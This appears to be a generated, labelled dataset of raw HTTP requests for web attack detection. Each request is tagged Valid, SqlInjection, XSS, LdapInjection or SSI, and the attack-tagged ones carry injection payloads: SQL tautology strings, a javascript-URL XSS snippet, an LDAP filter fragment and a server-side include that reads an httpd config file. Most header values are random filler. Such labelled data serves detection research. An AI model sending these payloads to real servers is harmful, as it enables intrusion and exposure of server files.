Pragma: asm='3p6a'
Proxy-Authorization: eitfn ddWoshr1=obTeG
Authorization: 8esr oanesgt=ewduef
Range: 662-4,8147-,483669-546
Referer: /lht4ln5/celef.cfm
TE: gzip,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.1 (X11; U; Linux i386 5.8; pi-sa; rv:4.1.9) Gecko/55755708
UA-CPU: Sparc
UA-Disp: 5821,502,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 9575x9608
Via: FTP/8.9 www.p5eSet.png, 2.8 www.iheere.jpeg:1516
Transfer-Encoding: compress
Upgrade: got9/5.0
Warning: 258 141.130.237.37 "ioreaseroE" "Tue, 27 Sep 05 18:21:28 UTC"
X-Forwarded-For: 111.220.164.212
X-Serial-Number: 7559329085977019735
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12335
Start - Id: 39126
class: LdapInjection
PUT /73tcec2et9eelata89c.css? HTTP/1.0
Content-Length: 47
Content-Language: z,eraQfaos
Content-Encoding: gzip
Content-Location: http://www.jea7.biz/bx3aune/4h4nd/tgexF/oseat.mspx
Content-MD5: c3RpRXJ0MWlpYWdpbGxscg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Oct 06 10:54:54 GMT
Last-Modified: Sun, 13 Mar 05 19:39:48 CET
Host: 31.133.148.59
Connection: eenttto
Accept: image/png;q=0.6, text/*, application/*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: identity;q=0.5, gzip;q=0.1, identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 110.34.203.36
Cookie: e8eziS8=yxrsi)(&(objectClass= 1dy*);8xBw7JrWx=36864;aulQoot=A  copytieeyv5uRI|5
Cookie2: $Version="7"
Date: Mon, 05 Apr 04 24:14:55 CET
ETag: "IiBhr6@ELXqVhT0AbKLV"
If-Modified-Since: Fri, 06 Nov 09 02:58:29 CET
If-Unmodified-Since: Sun, 13 Jan 08 15:11:48 UTC
If-Match: "abd@Ss1HpoaLgTRpmxa"
If-None-Match: *
If-Range: *
Max-Forwards: 555
Proxy-Authorization: Basic cmNxZDpuVHJ1
Authorization: Digest uri=http://www.gemvaj7u.biz/sener/inlizmm/eoeeioh.conf
Referer: http://loie.fr/dvieaetd.asp
TE: trailers,deflate,trailers
User-Agent: e6ets1r (iBguobOP; sDASzjvP; iRMhgf_3L; dLjCJx; 0ICRYqZKn)
UA-CPU: StrongARM
Via: atgaix/9.0 214.235.234.212, 3.4 www.tovr.jpg
Warning: 902 www.uilwPc.css:845 "oeiEs0u1" "Sat, 29 Nov 08 05:38:05 GMT"
X-Forwarded-For: 128.219.205.1

U2Dvar=03227&nofmataeVri=Rrtibe0&KHHQ=9EhiTSqfd

End - Id: 39126
Start - Id: 9797
class: Valid
GET /SSrM./rD-/fbbEnzc5-.Ks_ZQng/spwH8YJe/eoR8tt0t/n0tzeNosorwsepA/dpYCx8Y.BMeR6EsQyVjK/pnw.FmT-w7p3iwPlW/lGFi0bgo/hCopPweszT1XBo9x9UL/wm2awNina.shtml?rttunkra=a23aYgOwooe HTTP/1.0
Host: 39.121.182.158
Connection: 7lmTznh
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate;q=0.8, identity;q=0.4
Accept-Language: 8srFipi1-co6ehEii, fmoot-TkIy;q=0.9, 0eelsnu-l1a;q=0.3, y55-yen
Cache-Control: min-fresh=638
Client-ip: 142.252.165.176
Cookie: Jmnf=ytm;b2r6aafh=rtexecstdin0;sd=2
Cookie2: $Version="74"
Date: Sun, 23 Oct 05 08:16:34 UTC
ETag: "9QcqDrRniCsHj9Thro7"
Expect: i0hpyeh
From: frwpr@Te9h.be
If-Modified-Since: Thu, 03 Jan 08 05:54:25 GMT
If-Unmodified-Since: Mon, 24 Oct 05 21:22:53 UTC
If-Match: *
If-None-Match: "Sf3noBpWcJ22re.p282"
If-Range: "XkaC_lbUoG4g429L.v"
Max-Forwards: 678
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: IsiUr 6twklat=tyei
Authorization: Digest realm
Range: -988,03-4,64-3
Referer: http://etanr.it/Ar8fr.ace
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.8 (X11; U; SunOS sun4u 1.2; es-nr; rv:7.5.0) Gecko/10753952
UA-CPU: PowerPC
UA-Disp: 152,310,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3832x6503
Via: HTTP/5.5 www.axamp.tiff, 5.4 24.228.124.196
Transfer-Encoding: identity
Upgrade: jaeNfe/6.3, eitr/9.7, Eia/7.9, ryge/4.3
Warning: 928 www.ocTt.htm:04221 "zlt2ebnora" 
X-Forwarded-For: 215.67.208.226
X-Serial-Number: 3012101828224515543
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9797
Start - Id: 35149
class: SqlInjection
POST /oq/2TrVNeX-qH.exe? HTTP/1.0
Content-Length: 85
Content-Language: roorda,weniwcl,s
Content-Encoding: identity
Content-Location: /to6eee.swf
Content-MD5: cnU4dG5pZWFhbmdsVGR0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Oct 08 06:28:06 UTC
Last-Modified: Sat, 24 May 08 09:28:07 UTC
Host: www.anL6doe.fr:80
Connection: vca6
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 239.245.76.171
Cookie: xmriwS16ximac=ik4XwtKv;mrNGYnMo@a=oShome8hff>tx
Cookie2: $Version="7"
Date: Fri, 10 Dec 04 10:45:22 CET
ETag: W/"GLS9viRxwtjaVSxkna"
Expect: eel5Noee
From: mbaudh4h@tcta.net
If-Modified-Since: Tue, 09 Mar 10 05:21:09 CET
If-Unmodified-Since: Sun, 22 Jan 06 09:10:46 UTC
If-Match: "aD7YnMZArQwTPs2gw"
If-None-Match: "GxGrghoiNRTNfOd1Zf"
If-Range: Tue, 02 Oct 07 09:42:20 CET
Max-Forwards: 945
MIME-Version: 1.4
Pragma: o1cee=sg
Proxy-Authorization: Digest username="e7tedn"
Authorization: Basic ZDJlbjp0bGFsZjRu
Range: -960786
Referer: http://www.tljmf.org/eassngir/pagex8q/ikeMiw/h4zha.cgi
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: letWosdreedmhaettt
UA-Disp: 3713,1872,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9440x873
Via: 5.9 167.19.118.201, kv3/4.6 www.mknwTet.jpeg:938, 8.0 200.12.83.154
Transfer-Encoding: compress
Upgrade: ispEo/3.6, Yt33t/0.8, dlleet/6.1
X-Forwarded-For: 126.226.47.150
X-Serial-Number: 579595075261
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

deleteVreplace3qlibuqY=hLu~Co&oxc9sw=L2me&tmGis=OR 'aurdps' IN   ( ' ')

End - Id: 35149
Start - Id: 22028
class: Valid
GET /ijyoAvoihedme/yoogjg5oarbenpwhee/jj.YrNP2wz4c@_Q/mkjAtlITwtZa/pmeedtnELh/aVcKRHxyGh4Nk9/@yR5V6wget.asp?ogsnbesbn=6884102&nch9axqh=tncoh2er2t%7C&bpectoctth8e=tn%5DA HTTP/1.0
Host: www.iD4dfeT.biz:80
Connection: close
Accept: video/*, application/postscript;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 84.126.149.107
Cookie: CetcxsamC.0=n:5
Cookie2: $Version="4"
Date: Wed, 01 Dec 04 18:56:06 UTC
ETag: "IR9gJRDUeErmjjmYy"
Expect: iellsni=Marlereo
From: rnoHSnss@agsartc.de
If-Modified-Since: Mon, 19 Dec 05 16:45:44 UTC
If-Unmodified-Since: Mon, 02 Jul 07 02:41:56 GMT
If-Match: *
If-None-Match: "UZ2Bh2.J7zNRWBcNC3z"
If-Range: "Gkhq_8xV.zOjP2mkN"
Max-Forwards: 8
MIME-Version: 1.6
Pragma: fun='tdsc'
Proxy-Authorization: NTLM Um9zRndCZXRPaXl1MEU0c3RFY2xlcmRlM3JlZmdybnI=
Authorization: ts7en z7ehoeo=rtp7
Range: 5-448267
Referer: /sartet/ixdhk/mwsnhetp.css
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/0.4 (Windows; U; WinNT 3.2; mh-he; rv:7.7.8) Gecko/39437772
UA-CPU: StrongARM
UA-Disp: 207,573,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 915x5252
Via: t9T/6.8 www.pntse.gif, aj3i/8.7 www.otbEz.jpg
Transfer-Encoding: compress
Upgrade: p9tI/9.2, 8r9o/6.5, aeyn/9.3
Warning: 212 231.22.144.83 "rp7wet" "Tue, 22 Aug 06 23:48:18 GMT"
X-Forwarded-For: 154.57.178.151
X-Serial-Number: 10148622161169
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22028
Start - Id: 47152
class: XSS
GET /cje/cLa/a2GlOXJk/eNXvS/Tjrhreloe60za2/Rb7h@uekX5/gspeAJS/cMImwLae_/hei894ti/KY5-@/@TobjectoKvHrmeval.mspx?rKfromlogainputc=%3Cdiv++style++%3D++%22+background-image%3A+url%28javascript%3A+++%5Balert++%28%27rl0les%27%29%3B%5D%29%3B++++%22%3E&enp=1&Usae=886578782&vYf=ob%40wuFDM HTTP/1.1
Host: www.gtaxhLlpao.fr
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-turkish, iso-10646-ucs-2;q=0.5, windows-1258;q=0.9
Accept-Encoding: deflate;q=0.0, deflate;q=0.0, gzip, compress, deflate
Accept-Language: nanuCame-nTct
Cache-Control: no-cache
Client-ip: 181.228.8.193
Cookie: eohasf9R=4824803;9BvbscriptJ=eo;sde=eegov;FnFtEln=6v;qm0cihhobxei7M=aiSueetysws;jdrne0r=tb
Cookie2: $Version="225"
Date: Mon, 25 Jun 07 14:07:13 UTC
ETag: W/"0zXn4F-uIX@DtGV_"
Expect: muo3yy8a=tk5m5;ttscb
From: v1syist@Ntei5rra.com
If-Modified-Since: Fri, 24 Aug 07 17:42:58 CET
If-Unmodified-Since: Sun, 17 Jul 05 06:23:52 UTC
If-Match: "p@FdxEZ5d7SIrhrLmhI"
If-None-Match: "Bk@IKxqGEnEQMGu.e"
If-Range: Mon, 30 Nov 09 23:29:37 UTC
Max-Forwards: 317
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest response="A354AfF913f0aEf3F0CAdDFBA4c0E2c5"
Authorization: Digest realm
Range: -016,1-,67332-47295
Referer: http://4ene.org/Rpuaec/apnnm/todtFzda/cianT.php
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.4 (Windows; U; Win 9x 3.7; sh-bn; rv:9.8.7) Gecko/26210874
UA-CPU: 68000
UA-Disp: 9157,127,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 6020x621
Via: 4.8 140.128.117.70
Transfer-Encoding: deflate
Upgrade: see/0.0, ujnd/2.6, afee/4.4
Warning: 098 www.se8ib.png "Tiuetid8Hcaheepfhsi9" "Wed, 22 Feb 06 01:21:28 GMT"
X-Forwarded-For: 77.180.133.237
X-Serial-Number: 155966371996
----: ----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 47152
Start - Id: 42246
class: SqlInjection
GET /thbNurcHe/Gss/efeel6s/wnanDh4gje3echyai9/3ofm.aspx?loTvs9Necn=59&IitnN=%27++++group++by+users.id+++++having++++065%3D065&eoiso=siSosioooSovo4&2JYXwjhG=rca&oGuO=sknaf4&z5sten6tred=w&co62eoonrm=20642&iiypar5h=hi680qQq HTTP/1.0
Host: 126.43.172.243
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-turkish;q=0.7, windows-1250, iso-8859-5;q=0.0, euc-cn;q=0.2, us-ascii;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: lwskd=embt
Client-ip: 83.53.205.169
Cookie: msrwjR7rni=2064;aonselr=98698
Cookie2: $Version="8"
Date: Fri, 31 Mar 06 10:42:52 CET
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: AhkTtd8@hidg5ir.de
If-Modified-Since: Fri, 09 Jun 06 07:28:13 UTC
If-Unmodified-Since: Tue, 20 Dec 05 17:30:50 UTC
If-Match: "UAXZCto4bxH46S3dXFaz"
If-None-Match: *
If-Range: Fri, 27 Jan 06 20:28:41 GMT
Max-Forwards: 17
MIME-Version: 7.5
Pragma: hr='db5'
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: NTLM ZWxoZWF1aWl0MW5ldE0wZHcxd3FzeWxhc25udmZ3dXlzcGllcjVyd3NsdWhueXN4
Range: 4539-14148,-19,934-
Referer: /CltWt2e/Tsui/rnRiwsa2/eoheq/nuigoE.gz
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.5 (Machintosh; U; PPC Mac OS X 9.1; nm-eI; rv:1.6.7) Gecko/25272420
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 108x2342
Via: HTTP/1.9 25.245.83.106
Transfer-Encoding: gzip
Upgrade: rRra/8.9, int0ly/0.7
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42246
Start - Id: 29962
class: Valid
GET /evV1fgGL3/mddiec1suser/I--z/al/gvtotnnomthtujren/wheo6aha/N1E7%uPiaVhY/betweenXUdlmbin/lnWie0lNne/kANJ9Y2BtCP.php4? HTTP/1.0
Host: 218.153.173.229
Connection: close
Accept: application/postscript, application/zip, audio/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 247.18.105.163
Cookie: 6hrzNsjjrx2e=6iGctYZG-;dbsr=ei;mtSrh5dt=7te;ootestn=mscriptoptidocument;7abu=em4Y3z3pL
Cookie2: $Version="105"
Date: Sun, 23 May 04 19:56:36 UTC
ETag: W/"OoCODvniG414CQTK"
Expect: rieTrx
From: otohir@ybNenoy.com
If-Modified-Since: Sat, 10 Mar 07 09:53:35 GMT
If-Unmodified-Since: Wed, 20 Jul 05 22:08:46 UTC
If-Match: "VtnbkjG5JcUopmiZCWXZ"
If-None-Match: "qYUF0-cAYnVbLMyu"
If-Range: *
Max-Forwards: 506
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM c3JhZXRldG1iaW5Dbm15cXRubTVhaGFSOE5ubnRxeHRya01p
Authorization: Basic b29vbGVzOnhzdHJ2bk4=
Range: 054604-5
Referer: /aecsfapP.css
TE: deflate,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.5 (Windows; U; Windows NT 8.1; so-st; rv:1.4.3) Gecko/93101724
UA-CPU: Sparc
UA-Disp: 644,8528,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 797x977
Via: HTTP/8.9 www.ap9ki.css, 6.7 85.134.126.124
Transfer-Encoding: s1anE; ncutleNb=Gehn
Upgrade: eds/9.2, isa/3.3, kej/9.4
Warning: 929 111.138.94.34 "fYos2dhjediq09q9ela" "Sun, 20 Sep 09 07:36:42 GMT"
X-Forwarded-For: 223.222.247.27
X-Serial-Number: 95983
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29962
Start - Id: 34150
class: Valid
POST /hMnEHqAvQriwvYkY/dXqfx4vCW3imgbxT/gOtwsT_ktaZEmL.mdb? HTTP/1.1
Content-Length: 284
Content-Language: actnwinH,io5gflea,at
Content-Encoding: deflate
Content-Location: http://www.2nndoysH.biz/u6iss/elbny/stwe.jpg
Content-MD5: NHRlU29qaGVlYWU5ZWlpeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 23 Jun 09 11:37:44 CET
Last-Modified: Wed, 05 May 04 12:04:58 UTC
Host: www.iheohss.com:92
Connection: close
Accept: image/*
Accept-Charset: euc-cn;q=0.5, euc-kr;q=0.4, euc-kr, iso-8859-3
Accept-Encoding: identity
Accept-Language: *;q=0.7
Cache-Control: max-age=0
Client-ip: 112.140.17.197
Cookie: he=vl9eru9rpatSpnTlF
Cookie2: $Version="339"
Date: Thu, 22 Jun 06 19:21:43 CET
ETag: "KEI.oj4E9Hw.Jzu"
Expect: 100-continue
From: elh3tsco@Oytt10o9e.org
If-Modified-Since: Sat, 18 Mar 06 21:42:37 CET
If-Unmodified-Since: Tue, 24 May 05 20:07:44 CET
If-Match: "SocZ5wsXtLVXQuI"
If-None-Match: *
If-Range: Thu, 30 Oct 08 08:06:29 GMT
Max-Forwards: 26
MIME-Version: 9.1
Pragma: tEnarimu='rsaiy4m'
Proxy-Authorization: Digest cnonce="ri3ml"
Authorization: Basic dGRhdWJjOkVpYW1l
Range: -85
Referer: /Gfey/9odtnbxe/uchss/tas6icmn/yep2.pl
TE: chunked;q=0.8,gzip;q=0.3,trailers
Trailer: Connection
User-Agent: Mozilla/1.0 (Machintosh; U; PPC Mac OS X 8.3; np-cI; rv:1.0.4) Gecko/93398326
UA-CPU: x86
UA-Disp: 654,4575,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 995x590
Via: s9Opi/3.0 28.29.83.134:585, 0.0 www.dalfIrvx.html, oiiuh/8.9 www.tzd7hr.jpeg:81
Transfer-Encoding: bsktot; htve9uo=naht
Upgrade: r9e3sj/2.9, ssde/1.5, 28o5l/1.1, cra/1.9, oir/5.1
Warning: 430 www.d0rHcli.jpeg "6n5nftt7asfttaAsoneo" 
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 18830507621799
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

eaae0=kp&7nihu3vdD=neiI3teftrtaesBlds&Hstyleb9NYzQRoM=t4 &fgO_z6R@x=dgAwplunwzU2l&Si81wxpmoic=momsa6i&qee651eeRi=ytm&4ocs3Tioaa=eshrP1nsehevomO uo&arbbNta=2463&ncwhiOeI=h)aZo&ne=23077&pSpcssl=@an|auzi7%%ne&lhbo=584802&ghtpC=b aeijbebwfo&hcL=l5_yoda&7rstbbc7eyhppy=Ad+ue1-h

End - Id: 34150
Start - Id: 25661
class: Valid
GET /bZ7bML9DG1f/nmwhePumracot/wC59QStuHu0qF7w/v6hGTj/hecEonaFnesaiies/ncphh8awsok/SSGjgN6S@Q2/8EetNsssthhm3soy.htm?Imieinash9syh=sgOMIhryUW&oxl=368&rhlc=0337342&Uofce=3limgrvnxs+liers%7Cimga&Orls=y%3Crn%40he+%25%28Ietiframemq%5C&kNarnN=oJEJFTf&PwgetZgg9B=pJ2HG-Hcb&YRNuimg7fromx=hZ.Nvfu&shSnnDahTarna=gsl95a%3Bava+&bdl=224060887 HTTP/1.1
Host: 248.57.58.252
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic;q=0.2, euc-jp, iso-8859-1;q=0.3, x-mac-arabic;q=0.2, utf-7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 163.112.170.136
Cookie: V0formWCcN9=st;moohotaFa=356;etstusntoteoy=/so&e 
Cookie2: $Version="0"
Date: Wed, 14 Nov 07 05:16:29 UTC
ETag: W/"rFNiXPMA.yboNhTn"
Expect: dtictmI
From: ma49@uare.ch
If-Modified-Since: Sun, 18 Jun 06 13:06:59 CET
If-Unmodified-Since: Mon, 31 Mar 08 24:14:13 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 04 Aug 09 20:24:26 UTC
Max-Forwards: 9
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nc=cECD7cB1
Range: 0298-,9690-2,44-94
Referer: /hNxznls/dxt6er.zip
TE: gzip,trailers,trailers
Trailer: Range
User-Agent: bvhpj/1.7.1.0.7
UA-CPU: Sparc
UA-Disp: 564,067,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8007x0049
Via: 3.7 www.ertsnee.tiff
Transfer-Encoding: deflate
Upgrade: src/0.7
Warning: 768 71.160.96.112:815 "eemtw" "Sat, 22 Jan 05 09:40:57 GMT"
X-Forwarded-For: 236.247.161.119
X-Serial-Number: 33104741
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25661
Start - Id: 9176
class: Valid
GET /entyiluoErpa79/e-0fHdgMnzDDXVcpY/ew1VeOAc7fLnCFVc2/zFUGrjLJkUPnLwVDH/e7rmiesr.php3?wWutL=71638&ctorvamsaes=ac0ff8ieSonarj&mg=+&uJ@oxAVexec=gtm%29snt+%7Cts-++jty&bt8=6062007 HTTP/1.0
Host: www.ecR1t8tte.net
Connection: close
Accept: image/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oeeotrss-eejT;q=0.5, e1eitt-i9hot, it1i-2oivonme, mTietCt-eibmwj
Cache-Control: only-if-cached
Client-ip: 146.36.45.219
Cookie: _VUyZQopenXv@f=sr2ptrizie9a;nr8SUX8_img=76579;nlyfapayeejY=493;ao9onasduap= $bqh
Cookie2: $Version="030"
Date: Mon, 27 Jul 09 10:56:52 GMT
ETag: "rEE-tdpS_ggUaMi9E"
Expect: i8av9tuP
From: fwtTde@tnn0ld58.biz
If-Modified-Since: Mon, 19 Oct 09 17:32:44 CET
If-Unmodified-Since: Sat, 23 Dec 06 10:26:05 CET
If-Match: "V0hgBsCdq_2z8SkS"
If-None-Match: "713fjdXl7.K-G.FN"
If-Range: Fri, 12 May 06 03:53:09 GMT
Max-Forwards: 913
MIME-Version: 8.7
Pragma: Bmr='ogSesepr'
Proxy-Authorization: Basic aW5yc246b252azI=
Authorization: Basic ZWRvbzVlODpmZXRvYWU=
Range: 57164-,9027-962000
Referer: http://ivfcoelc.com/dkkalh.jsp
TE: trailers
Trailer: From
User-Agent: 5err9twodm/8.9
UA-CPU: StrongARM
UA-Disp: 226,033,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3033x117
Via: 0.0 39.141.0.225:0, ugooe/3.3 46.206.34.11:452, HTTP/9.3 248.229.239.80
Transfer-Encoding: gzip
Upgrade: panea/0.7, tloc/9.9, wgi/7.6
Warning: 905 www.dgfeerSr.html:96082 "t0ewrycrethaeHou7" "Thu, 31 Mar 05 07:13:11 GMT"
X-Forwarded-For: 27.154.204.77
X-Serial-Number: 51512121332021601
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9176
Start - Id: 19871
class: Valid
GET /aO2esyisgeida/bMsg6R@0X/iQbOIt4FGUJ/yMo/y6u.syeq3E1.dll? HTTP/1.0
Host: 102.247.146.24
Connection: aOmec54
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iz-8Peixhso;q=0.3, 2ayho-i, 2-na;q=0.3, iebzcr-eyI, diN-cyhi
Cache-Control: deotr=o
Client-ip: 169.241.81.8
Cookie: EuTnsueeECnm=weBIaMBa.;tmp3Bv=0731;bSooeaissz7=etcadocumentuei|6;ealH6wfaobqntel=ee4 dbEl ;xterm6r71xb=4FYs0Qz
Cookie2: $Version="919"
Date: Wed, 03 Dec 08 06:54:18 UTC
ETag: "EOrffeq49PfEhy3d0pn"
Expect: 100-continue
From: ebMr@ot7cggaev.net
If-Modified-Since: Sun, 27 Jan 08 01:35:36 CET
If-Unmodified-Since: Mon, 05 Oct 09 18:17:48 GMT
If-Match: *
If-None-Match: "aoJBNMSoMZp0IGC"
If-Range: *
Max-Forwards: 38
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: tIsore haesemqr=7tm5
Authorization: tea1o nhanj=jrinhc
Range: 752-,475-082626,-6481
Referer: http://www.Sn1rOrD.it/c6tt/7f09e/lnmcasNd/3are/8sloiv.mp3
TE: gzip;q=0.8
Trailer: Authorization
User-Agent: eOE81@q9E http://www.siiwmwhz.be
UA-CPU: StrongARM
UA-Disp: 8005,879,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 378x5840
Via: FTP/9.2 98.202.222.16, 0.6 182.84.33.203, 7.6 www.mcohttt.jpeg
Transfer-Encoding: deflate
Upgrade: ieot/7.9
Warning: 012 238.206.177.212 "rtnhhhdpscco" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 55629847157981677810
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19871
Start - Id: 3713
class: Valid
GET /dc9E_ZwO2drhVtj79gW/0sh6l/hosne/eQ03KftQZr2T.htm? HTTP/1.0
Host: 38.179.181.172
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: ks_c_5601-1987
Accept-Encoding: 
Accept-Language: eCwn-x;q=0.6, dmbnTtel-oiEofasE, r2Mi-Yei, EygiFmd-iodEeyhc, si-emhsrf5Q
Cache-Control: no-cache
Client-ip: 82.193.56.163
Cookie: snz8o=uL53;5yealrhrileajs=tedPoformuhxxs0dpTs;wGl0ace=en;aunolHeWiAtIsim=nfv
Cookie2: $Version="06"
Date: Tue, 10 Aug 04 06:26:09 CET
ETag: "SEp1TwK1cUkWwLx6Ebdr"
Expect: mjtiwd
From: mlrs@mfdec.biz
If-Modified-Since: Sat, 14 Apr 07 16:59:05 GMT
If-Unmodified-Since: Thu, 08 Oct 09 11:22:58 GMT
If-Match: *
If-None-Match: "qV2VbEp.bvYl9w-m3RVM"
If-Range: "XyXROkLT3dokqVvQtXAV"
Max-Forwards: 89
MIME-Version: 3.4
Pragma: n=rr6tgpm
Proxy-Authorization: y4v4a Ntmbna=bsfti
Authorization: haoa cnjrI=6rh1z
Range: 355373-92094,2954-
Referer: /sUEa.mp3
TE: gzip,trailers,trailers
Trailer: Host
User-Agent: oae3mhr5n/4.7.9.8.3
UA-CPU: PowerPC
UA-Disp: 7385,2023,32
UA-OS: Windows NT
Via: 3.2 www.znhdo0.html:2
Transfer-Encoding: identity
Upgrade: gsllay/9.9, kj6hn/8.2
Warning: 281 36.243.253.191 "hxpehuhbsrd4egeo" 
X-Forwarded-For: 95.113.101.82
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 3713
Start - Id: 27687
class: Valid
GET /N4mnyeotniPi/Fq9FVQ.hQGt8D/nAae.jpg? HTTP/1.0
Host: www.nyhdur.net
Connection: Xpnd
Accept: application/*;q=0.4, application/postscript
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 163.4.168.12
Cookie: _rPLwp--RAX@EZ=06;tt=it;ssveg=tQcouenioleuioe;Hreahsrxp=a1d1esfttubfaiqk4t;z1Pg=1so
Cookie2: $Version="23"
Date: Mon, 07 Dec 09 20:01:30 CET
ETag: W/"jjbn.BcKvzk8oUEXzB33"
Expect: 100-continue
From: sSue@OaasXm.net
If-Modified-Since: Thu, 21 May 09 15:50:21 UTC
If-Unmodified-Since: Mon, 11 Jul 05 24:01:36 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 46
MIME-Version: 9.8
Pragma: ymhEelIA='aEasHsu'
Proxy-Authorization: bigT jsta3s=3stlP
Authorization: NTLM YXk0dHdhd3dlaGk3bUlJbHJsZm9TMnJkRWw2eXNvZW5zbHltZU9zbm1DZw==
Range: 716735-,44690-4,8-024480
Referer: /sdtmtY/eRwedrna/0jbFqa/x0oii.jsp
TE: gzip,trailers,chunked
Trailer: Range
User-Agent: nk5hpi/9.2
UA-CPU: 68000
UA-Disp: 408,9856,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1357x8118
Via: 3.0 www.iHtsi.css, nhye/5.8 www.ar4dotao.htm, 1.9 15.105.188.87:7602
Transfer-Encoding: identity
Upgrade: 7tihjo/8.0, sel/5.7, yAiesw/1.4
Warning: 970 72.235.240.132 "rtdlLp" 
X-Forwarded-For: 24.95.0.215
X-Serial-Number: 9842192214995
----: -----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27687
Start - Id: 39842
class: SSI
POST /utglan1mhisthsett/oojr2xnxsnn/wewuve/cedwetnczCoqeieeiq6a/5RnURK.z7KbBPm/frE4bb/aC/oI.aOePZJ8u7H0/rptyra1zaenUuee/OedTpouM/uOZdeY9kXPyef@9J/UIf7wJz0GC-SPr.dll? HTTP/1.1
Content-Length: 340
Content-Language: nt,0iO3yih
Content-Encoding: deflate
Content-Location: http://Ehflbnro.gov/1iiptk/pTrtfn/tn0rAd.nsf
Content-MD5: UnJUdHZsaXVsVmhvcmlubQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Oct 06 15:59:37 CET
Last-Modified: Wed, 21 Nov 07 18:11:12 CET
Host: www.cmsqn.biz:822
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254;q=0.3, windows-1258
Accept-Encoding: <!-- #include     virtual="/etc/httpd/httpd.conf" -->
Accept-Language: *;q=0.3
Cache-Control: min-fresh=4
Cookie: o3lnaohdtmIhte=h9TqmTid1o;trrns=d;sEdjp5ho=a yay
Date: Thu, 24 May 07 05:47:52 UTC
From: opeU@eael.be
If-Modified-Since: Fri, 23 Jun 06 18:45:41 GMT
If-Unmodified-Since: Wed, 07 Oct 09 17:13:33 GMT
If-Match: "BWWZfCi_DLDM0@TW"
If-None-Match: *
